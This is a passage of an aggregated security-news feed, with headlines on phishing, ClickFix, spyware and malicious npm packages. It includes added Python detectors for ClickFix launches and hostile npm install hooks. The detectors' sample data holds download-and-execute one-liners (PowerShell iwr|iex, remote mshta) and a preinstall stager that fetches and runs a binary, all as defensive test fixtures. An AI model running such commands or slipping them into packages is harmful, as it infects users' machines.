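    if auth_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rpIdHash does not match rpId"
    if not auth_data[32] & FLAG_UP:
        return False, "user presence flag not set"
    return True, "ok"


def demo():
    """Genuine login versus the same challenge relayed through a lookalike host."""
    genuine = verify_assertion(browser_client_data("https://login.example.com", CHALLENGE),
                               authenticator_data(RP_ID), CHALLENGE)
    # The proxy forwards the real challenge, but the victim's browser is on the
    # lookalike host, so it records that origin and hashes that rpId.
    proxied = verify_assertion(browser_client_data("https://login.example-com.invalid", CHALLENGE),
                               authenticator_data("login.example-com.invalid"), CHALLENGE)
    return genuine, proxied


if __name__ == "__main__":
    for label, result in zip(("genuine", "proxied"), demo()):
        print(label, result)
```

A real verifier must also check the assertion signature with the credential's stored public key and enforce a monotonically increasing signCount; the point shown is only that the relayed challenge passes while the origin and rpIdHash do not, which is why origin-bound MFA survives kits that code-based MFA does not.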

Introducing KnowBe4 Studios | Fresh Content Updates from October 2025

We’re thrilled to announce KnowBe4 Studios, uniting our world-class creative teams under one powerful brand. Leveraging the latest AI technologies and the expertise of our global content creators, we’re set to produce more engaging cybersecurity training than ever before—including fresh microcontent, interactive games, and expanded storytelling experiences. This evolution marks the next chapter in delivering the most popular cybersecurity and highest-rated content on the planet, with even greater innovation, creativity, and impact ahead.

Warning: ClickFix Attacks are Growing More Sophisticated

Researchers at Push Security warn of an extremely convincing ClickFix attack posing as a Cloudflare verification check. ClickFix is a social engineering technique that tricks the victim into copying and pasting a malicious command, then running it on their computer. 

CyberheistNews Vol 15 #45 [Under the Radar] Scammers Use Real Bodies, Fake Faces in Extortion Scams

Quantum Route Redirect: Anonymous Tool Streamlining Global Phishing Attack

Lead Analysts: Jeewan Singh Jalal, Prabhakaran Ravichandhiran and Anand Bodke

KnowBe4 Threat Labs has uncovered an emerging advanced phishing campaign targeting Microsoft 365 users globally to steal their credentials. The attackers are wielding a powerful new tool that’s completely changing the game for cybercriminals—turning what used to be complex, technical phishing setups into simple one-click launches that can bypass certain technical controls.

Africa is Being Targeted by a Surge in AI-Fueled Phishing Attacks

AI-fueled cyberattacks are increasingly targeting entities across Africa, according to Robert Lemos at Dark Reading.

Lemos cites two recent reports from Microsoft and Group-IB that warned of a rise in attacks targeting African organizations, with threat actors using AI to assist in various steps of the attack chain.

Warning: Malicious Apps Are Impersonating AI Tools

Researchers at Appknox warn that malicious apps are impersonating popular AI tools like ChatGPT and DALL-E to trick users into installing malware on their mobile devices. Some of these apps simply collect user data to be sold to advertising services, while others act as full-fledged malware.

MY TAKE: AI’s fortune-teller effect — why it’s all too easy to mistake pattern mastery for wisdom

I hadn’t expected the machine’s answer to be that good.

Related: The AI bubble is inflating

It was a simple prompt — I needed help crafting a reply to a client. One of those mid-project check-ins where timing gets murky … (more…)

The post MY TAKE: AI’s fortune-teller effect — why it’s all too easy to mistake pattern mastery for wisdom first appeared on The Last Watchdog.

GUEST ESSAY: How to defend against decision mimicry — a practical AI-era checklist for leaders

AI is getting better at mimicking how leaders think — not just how they sound.

Related: Can AI mimic my personality?

The latest wave of deepfake attacks isn’t about dramatic voice-cloning or bold social engineering. Instead, the bigger risk may … (more…)

News Alert: Gartner ranks ThreatBook a ‘strong performer’ in NDR for the third consecutive year

SINGAPORE, Nov. 13, 2025, CyberNewswire – ThreatBook, a global leader in threat intelligence-based cybersecurity solutions, today announced that for its Threat Detection Platform (TDP), it has been recognized as a Strong Performer in the 2025 Gartner Peer Insights Voice of … (more…)

News alert: Insider risk report finds behavioral blind spots leave most orgs exposed, confidence low

BALTIMORE, Nov. 4, 2025, CyberNewswire — The new 2025 Insider Risk Report, produced by Cybersecurity Insiders in collaboration with Cogility, highlights that nearly all security leaders (93%) say insider threats are as difficult or harder to detect than … (more…)

MY TAKE: From AOL-Time Warner to OpenAI-Amazon — is the next tech bubble already inflating?

Anyone remember the dot-com bubble burst? The early warning came in January 2000, when AOL and Time Warner joined forces in a $164 billion deal — the largest merger in U.S. history at the time.

Related: Reuters’ backstory on Amazon (more…)

MY TAKE: Microsoft pitches an AI ‘protopian’ future — while civic groups pedal to stay upright

SEATTLE – At a well-meaning civic forum hosted inside a south Seattle community space yesterday (Oct. 30), Microsoft’s Lorraine Bardeen coined a new term: protopian.

Related: The workflow cadences of GenAI

She said it three times, as if underlining … (more…)

News alert: Aembit extends Workload IAM to close the access-control gap in enterprise AI deployments

SILVER SPRING, Md., Oct. 30, 2025, CyberNewswire – Aembit today announced the launch of Aembit Identity and Access Management (IAM) for Agentic AI, a set of capabilities that help organizations safely provide and enforce access policies for AI agents as … (more…)

MY TAKE: What a cystoscopy taught me about the changing face of patient care — and trusting AI

The other day, I found myself flat on my back in a urologist’s exam room, eyes fixed on the ceiling tiles as a cystoscope made its slow, deliberate circuit.

Related: Click-baiters are having an AI field day

Dr. Mitchell narrated … (more…)

MY TAKE: Have you noticed how your phone’s AI assistant is starting to remap what you trust?

This morning, I tried to power down my Samsung S23 smartphone.

Related: Sam Altman seeks to replace the browser

I long-pressed the side key expecting the usual “Power off / Restart” menu. Instead, a small Gemini prompt window appeared towards … (more…)

News alert: Arsen rolls out ‘Smishing Simulation’ to strengthen defenses against mobile phishing threats

PARIS, Oct. 24, 2025, CyberNewswire – Arsen, the cybersecurity company dedicated to helping organizations defend against social engineering, today introduced its new Smishing Simulation module: a feature designed to let companies run realistic, large-scale SMS phishing simulations across their … (more…)

Be careful responding to unexpected job interviews

Contacted out of the blue for a virtual interview? Be cautious. Attackers are using fake interviews to slip malware onto your device.

Your passport, now on your iPhone. Helpful or risky?

Apple's Digital ID makes travel smoother and saves you from digging for documents, but it comes with privacy and security trade-offs. We break down the pros and cons.

1 million victims, 17,500 fake sites: Google takes on toll-fee scammers

Google’s suing Lighthouse, a Chinese Phishing-as-a-Service platform that uses Google’s branding on scam sites to trick victims.

Are you paying more than other people? NY cracks down on surveillance pricing

New York is calling out data-driven pricing, where algorithms use your clicks, location and search history to tweak what you pay.

We opened a fake invoice and fell down a retro XWorm-shaped wormhole

In 2025, receiving a .vbs “invoice” is like finding a floppy disk in your mailbox. It's retro, suspicious, and definitely not something you should run.

Phishing emails disguised as spam filter alerts are stealing logins

Think twice before clicking that "Secure Message" alert from your organization's spam filters. It might be a phish built to steal your credentials.

Update now: November Patch Tuesday fixes Windows zero-day exploited in the wild

This month’s Windows update closes several major security holes, including one that’s already being used by attackers. Make sure your PC is up to date.

How Malwarebytes stops the ransomware attack that most security software can’t see

Discover how Malwarebytes detects and blocks network-based ransomware attacks that bypass traditional ransomware protection.

Samsung zero-day lets attackers take over your phone

A critical vulnerability that affects Samsung mobile devices was exploited in the wild to distribute LANDFALL spyware.

How credentials get stolen in seconds, even with a script-kiddie-level phish

Even a sloppy, low-skill phish can wreck your day. We go under the hood of this basic credential-harvesting campaign.

Stolen iPhones are locked tight, until scammers phish your Apple ID credentials

Stolen iPhones are hard to hack, so thieves are phishing the owners instead. How fake ‘Find My’ messages trick victims into sharing their Apple ID login.

Fantasy Hub is spyware for rent—complete with fake app kits and support

Fantasy Hub RAT-for-rent hides in fake Android apps, stealing logins, PINs, and messages—all with a single SMS permission.

Watch out for Walmart gift card scams

The only thing you’re winning here is a spot on marketing lists you never asked to join.

A week in security (November 3 – November 9)

A list of topics we covered in the week of November 3 to November 9 of 2025

Malwarebytes scores 100% in AV-Comparatives Stalkerware Test 2025

AV-Comparatives put 13 top Android security apps to the test against stalkerware. Malwarebytes caught them all.

Fake CAPTCHA sites now have tutorial videos to help victims install malware

ClickFix campaign pages now have embedded videos to helpfully walk users through the process of infecting their own systems.
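
The two ClickFix entries on this page (the Push Security write-up of a fake Cloudflare verification check and these video-assisted fake CAPTCHA pages) share one telemetry fingerprint: a user-driven launcher (the Win+R Run box, a terminal) spawns an interpreter with a download-and-execute one-liner, often with a comment appended so the Run box reads like a verification step. The detection below is an added example, not code from the page, from Push Security or from Malwarebytes; the Sysmon-style field names, the indicator weights and the four sample events (with documentation IP addresses) are constructed for it.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example; not from the original page. Field names follow Sysmon Event ID 1
(ParentImage, Image, CommandLine); the events in SAMPLE_LOG, the indicator
weights and the threshold are constructed assumptions for this demo.
"""
import json
import re

# Where a pasted one-liner ends up running.
CHILD_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                      "wscript.exe", "cscript.exe", "curl.exe"}
# Parents that mean a person pasted it (Run box, a terminal), as opposed to a
# service or scheduler that legitimately runs encoded PowerShell.
USER_PASTE_PARENTS = {"explorer.exe", "windowsterminal.exe"}

# (name, weight, pattern). Weights are a judgement call for the demo.
INDICATORS = [
    ("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded_command", 1, re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download_cradle", 1, re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|downloadstring|downloadfile)\b", re.I)),
    ("inline_exec", 1, re.compile(r"\b(?:iex|invoke-expression)\b|\|\s*(?:cmd|sh|bash|powershell|pwsh)\b", re.I)),
    ("mshta_remote", 2, re.compile(r"\bmshta(?:\.exe)?\s+[\"']?https?://", re.I)),
    # The lure appends a comment so the Run box shows "I am not a robot ..." text.
    ("captcha_lure_comment", 2, re.compile(r"#.*(?:not a robot|captcha|verification id|ray id)", re.I)),
]
ALERT_THRESHOLD = 2

# Constructed events: 1 and 2 are ClickFix launches, 3 is an admin running a
# script from the Run box, 4 is a scheduled task running encoded PowerShell.
SAMPLE_LOG = r"""
{"EventRecordID": 1, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iwr http://198.51.100.23/verify.ps1 | iex\" # I am not a robot - reCAPTCHA Verification ID: 7811"}
{"EventRecordID": 2, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://203.0.113.9/check.hta"}
{"EventRecordID": 3, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"}
{"EventRecordID": 4, "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NonInteractive -enc SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA="}
"""


def basename(path):
    """Lower-cased file name, tolerant of Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def score_event(event):
    """Return (score, [indicator names]) for the command line alone."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, _w, pat in INDICATORS if pat.search(cmd)]
    score = sum(w for name, w, _p in INDICATORS if name in hits)
    return score, hits


def detect_clickfix(events):
    """Alert only on user-pasted interpreter launches that clear the threshold."""
    alerts = []
    for ev in events:
        if basename(ev.get("ParentImage", "")) not in USER_PASTE_PARENTS:
            continue
        if basename(ev.get("Image", "")) not in CHILD_INTERPRETERS:
            continue
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"record": ev.get("EventRecordID"), "score": score,
                           "hits": hits, "command": ev.get("CommandLine", "")})
    return alerts


if __name__ == "__main__":
    for alert in detect_clickfix(parse_events(SAMPLE_LOG)):
        print(alert)
```

Because explorer.exe is also the parent of legitimate Run-box and shortcut launches, the rule keys on the combination of parent, interpreter and two or more indicators rather than any one of them; event 4 shows why the parent check matters, since encoded PowerShell under svchost.exe is routine for scheduled tasks. On a live host the pasted command also survives in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting in triage.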

Hackers commit highway robbery, stealing cargo and goods

There’s a modern-day train heist happening across America, and some of the bandana-masked robbers are sitting behind screens.

Android malware steals your card details and PIN to make instant ATM withdrawals

Forget card skimmers—this Android malware uses your phone’s NFC to help criminals pull cash straight from ATMs.

Take control of your privacy with updates on Malwarebytes for Windows

Malwarebytes for Windows introduces powerful privacy controls, so you get to decide how Microsoft uses your data—all from one simple screen.

Cyberattacks on UK water systems reveal rising risks to critical infrastructure

New data shows hackers targeted UK water systems five times since 2024, raising concerns about critical infrastructure defenses worldwide.

Global Data Breaches and Cyber Attacks in October 2025 – At Least 21.2 Million Breached Records

Summary: Welcome to another monthly round-up of cyber attack and data breach news. October 2025 saw 20 publicly reported cyber attacks and data breaches around the globe. In total, at least 21.2 million records were confirmed to have been breached. As ever, these are the incidents that made the news this month; the list is, by necessity, far from exhaustive. The month’s five largest incidents: Prosper Marketplace, Dukaan, Allianz Life Insurance Company of North America, WestJet, Motility Software Solutions. Remaining sections: Trends in October 2025; Key vulnerabilities exploited; List of data breaches and cyber attacks disclosed in October 2025 (table columns begin: Disclosure date, Organisation)

The post Global Data Breaches and Cyber Attacks in October 2025 – At Least 21.2 Million Breached Records appeared first on IT Governance Blog.

GRC Solutions Named Among the UK’s Top 20 Cyber Security Innovators

We’re delighted to announce that GRC Solutions – the new name for IT Governance – has been recognised as one of the UK’s leading cyber security companies, ranking 19th in TechRound’s Cybersecurity40 2025 list. The annual campaign celebrates the most innovative and forward-thinking cyber security organisations across the UK and Europe, highlighting those helping businesses and public bodies stay secure in an increasingly complex threat landscape. TechRound – the UK’s independent voice for startups and the wider technology sector – evaluates entrants based on innovation, impact and contribution to the cyber security industry. The 2025 list showcases a diverse range

Data Leakage Prevention and Data Deletion – ISO 27001 Controls 8.12 and 8.10 Explained

ISO 27001:2022 introduced several new controls designed to reflect modern security practices and the ways organisations use and manage data. Two of the most practical additions sit in the operational controls: 8.12 (data leakage prevention) and 8.10 (data deletion). Both address longstanding weaknesses in many ISMSs (information security management systems). They focus on the lifecycle of data, the risks created by its movement and the need to prevent unnecessary retention. They also bring ISO 27001 closer to regulatory expectations, particularly around access control, monitoring and data minimisation. This blog post explains what the two controls require, why they were introduced

Threat Intelligence – ISO 27001:2022 Control 5.7 Explained

Cyber attacks evolve faster than traditional security review cycles. So, to stay secure, organisations need a clearer understanding of the threats that are most relevant to their systems, data and business operations. Threat intelligence is the process of collecting and analysing information about these threats so that security decisions are informed by real-world attack patterns rather than theoretical risk models. Done well, it enables organisations to both pre-empt attacks and respond more effectively when incidents happen. This is the purpose of ISO 27001:2022 control 5.7. As one of 11 new controls introduced by the 2022 iteration of the Standard, it

How DORA fits with ISO 27001, NIS2 and the GDPR

Although DORA (the EU Digital Operational Resilience Act) has been in effect since January 2025, organisations that supply the EU’s financial services sector are under growing pressure to demonstrate compliance with its requirements. For most, this isn’t about starting from scratch but about mapping what’s already in place, identifying where DORA goes further and then expanding on current practices. After all, DORA builds on – not replaces – established frameworks, standards and other compliance regimes such as ISO 27001, NIS2 (the Network and Information Security Directive 2) and the GDPR (General Data Protection Regulation). It formalises ICT risk governance for

CISM Exam Tips from a Consultant: Five Insider Insights to Help You Pass

The CISM® (Certified Information Security Manager) exam is one of the toughest in the field – according to most providers, pass rates are around 60–65% (ISACA doesn’t publish official figures). Even experienced professionals find it demanding, something our consultants know first-hand. Soji Ogunjobi is a cyber security specialist and instructor, with nearly two decades of experience as a cyber security professional and IT auditor. He also has an MSc in Information Technology, Computer and Information Systems, as well as CISM, CISSP, CISA, CCSP and various other cyber security qualifications. Below are five practical CISM exam tips drawn directly from his

How To Comply with ISO 27001’s New Cloud Services Control

The 2022 update to ISO 27001 introduced a new control for the use of Cloud services. It outlines the policies and procedures that are required when acquiring, using, managing or exiting Cloud services. Adding this control was an obvious and necessary step given just how many organisations use Cloud services as part of their core business activities. An estimated 96% of all organisations use at least one Internet-based IT resource, such as Amazon Web Services or Microsoft Azure. Whenever an organisation implements a new resource on which sensitive data is stored or upon which key business activities rely, it must

What DORA Means for ICT Suppliers: MSPs, SaaS and Cloud in Scope

If you provide ICT (information and communication technology) services to financial institutions in the EU – whether managed services, SaaS (software as a service), Cloud facilities, payment infrastructure, or other tools and platforms – then DORA (the EU Digital Operational Resilience Act) affects you. What does DORA do? DORA creates a single, EU-wide framework for ICT risk management, incident reporting, resilience testing, third-party risk and information sharing for financial services companies. It also establishes a supervisory regime for their third-party ICT providers. For suppliers, two points are therefore important. What it means in practice: you will likely see DORA in RFPs

Cyber Security Must Be a Board Priority – And It Starts With Cyber Essentials

Senior ministers and national security officials have called on boards to take urgent action to strengthen their organisations’ cyber resilience. The Chancellor of the Exchequer, the Secretaries of State for Science, Innovation and Technology and for Business and Trade, the Minister for Security, the Chief Executive of the NCSC (National Cyber Security Centre) and the Director General of the NCA (National Crime Agency) have co-signed an open letter to FTSE 350 companies and other large UK organisations, warning that hostile cyber activity in the UK is “growing more intense, frequent and sophisticated”, posing “a direct and active threat to our

Top 5 Skills Every ISO 27001 Internal Auditor Needs

Internal audits are essential to ISO 27001 compliance, as mandated by Clause 9.2 – but what does it actually take to be an effective internal auditor? Many professionals know the Standard from a theoretical point of view but are less confident about audit practicalities such as interviewing staff, sampling evidence, writing findings and presenting results without friction. This blog post breaks down five practical skills every internal auditor needs and how training helps build them, turning theory into repeatable practice. Skill 1 – Evidence gathering: the auditor’s role is to test whether the ISMS operates as described and achieves its

Crypto wasted: BlueNoroff’s ghost mirage of funding and jobs

Kaspersky GReAT experts dive deep into the BlueNoroff APT's GhostCall and GhostHire campaigns. Extensive research detailing multiple malware chains targeting macOS, including a stealer suite, fake Zoom and Microsoft Teams clients and ChatGPT-enhanced images.

Mem3nt0 mori – The Hacking Team is back!

Kaspersky researchers discovered previously unidentified commercial Dante spyware developed by Memento Labs (formerly Hacking Team) and linked it to the ForumTroll APT attacks.

Deep analysis of the flaw in BetterBank reward logic

Kaspersky experts break down the recent BetterBank incident involving ESTEEM token bonus minting due to the lack of liquidity pool validation.

The evolving landscape of email phishing attacks: how threat actors are reusing and refining established techniques

Common email phishing tactics in 2025 include PDF attachments with QR codes, password-protected PDF documents, calendar phishing, and advanced websites that validate email addresses.

PassiveNeuron: a sophisticated campaign targeting servers of high-profile organizations

Kaspersky GReAT experts break down a recent PassiveNeuron campaign that targets servers worldwide with custom Neursite and NeuralExecutor APT implants and Cobalt Strike.

Post-exploitation framework now also delivered via npm

The npm registry contains a malicious package that downloads the AdaptixC2 agent onto victims' devices, Kaspersky experts have found. The threat targets Windows, Linux, and macOS.
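
The entry above names the registry and the agent but not how the package drops it; the first place to look in a suspect dependency is its lifecycle scripts, which npm runs automatically during install. The auditor below is an added example, not code from the page or from Kaspersky, and it assumes install-time scripts as the vector to inspect; the package names, version numbers, stager command and URL are constructed for the demonstration.

```python
"""Audit npm manifests for lifecycle scripts that fetch or run code at install time.

Added example; not from the original page. SAMPLE_MANIFESTS, the indicator
patterns and the known-benign list are constructed assumptions for this demo.
"""
import re

# Scripts npm runs on its own when a dependency is installed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (name, pattern): signs that a hook pulls or runs something beyond building the package.
SUSPICIOUS = [
    ("remote_fetch", re.compile(r"\bcurl\b|\bwget\b|https?://|require\(['\"]https?['\"]\)|fetch\(", re.I)),
    ("inline_node", re.compile(r"\bnode\s+-(?:e|-eval|p)\b", re.I)),
    ("obfuscation", re.compile(r"base64|Buffer\.from\(|\beval\(|String\.fromCharCode|\\x[0-9a-f]{2}", re.I)),
    ("exec_payload", re.compile(r"child_process|execSync\(|spawn\(|chmod\s+\+x|\|\s*(?:sh|bash)\b", re.I)),
]
# Native-module builds and git hooks that legitimately use install hooks.
KNOWN_BENIGN = {"node-gyp rebuild", "prebuild-install || node-gyp rebuild", "husky", "husky install"}

# Constructed stager: fetch a binary, mark it executable, run it, all inside preinstall.
_STAGER = ("node -e \"require('https').get('https://203.0.113.5/a', r => r.pipe("
           "require('fs').createWriteStream('/tmp/.a')).on('finish', () => "
           "require('child_process').execSync('chmod +x /tmp/.a && /tmp/.a')))\"")

SAMPLE_MANIFESTS = [
    {"name": "native-image-lib", "version": "4.2.0",
     "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}},
    {"name": "pretty-log-utils", "version": "1.0.3",
     "scripts": {"preinstall": _STAGER}},
    {"name": "some-cli", "version": "2.1.0",
     "scripts": {"postinstall": "node scripts/setup.js"}},
]


def audit_manifest(manifest):
    """One finding per lifecycle hook: 'high' when an indicator fires, 'review'
    when the hook only runs a file shipped in the package (read that file)."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command or command.strip() in KNOWN_BENIGN:
            continue
        hits = [name for name, pat in SUSPICIOUS if pat.search(command)]
        findings.append({
            "package": manifest.get("name"), "version": manifest.get("version"),
            "hook": hook, "command": command, "indicators": hits,
            "severity": "high" if hits else "review",
        })
    return findings


def audit_tree(manifests):
    """Flatten findings across a dependency tree, worst first."""
    findings = [f for m in manifests for f in audit_manifest(m)]
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["package"] or ""))


if __name__ == "__main__":
    for finding in audit_tree(SAMPLE_MANIFESTS):
        print(finding["severity"], finding["package"], finding["hook"], finding["indicators"])
```

To run it over an installed tree, json.load each node_modules/*/package.json (and scoped @org/*/package.json) and pass the list to audit_tree. Installing with npm install --ignore-scripts, or setting npm config set ignore-scripts true, stops hooks from running at all, at the cost of native modules that need them, which is why a known-benign list is kept rather than blocking every hook.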

SEO spam and hidden links: how to protect your website and your reputation

Are you seeing your website traffic drop, and security systems blocking it for pornographic content that is not there? Hidden links, a type of SEO spam, could be the cause.

Maverick: a new banking Trojan abusing WhatsApp in a mass-scale distribution

A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It delivered a new Maverick banker, which features code overlaps with Coyote malware.

Mysterious Elephant: a growing threat

Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity. The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.

Signal in the noise: what hashtags reveal about hacktivism in 2025

Kaspersky researchers identified over 2000 unique hashtags across 11,000 hacktivist posts on the surface web and the dark web to find out how hacktivist campaigns function and whom they target.
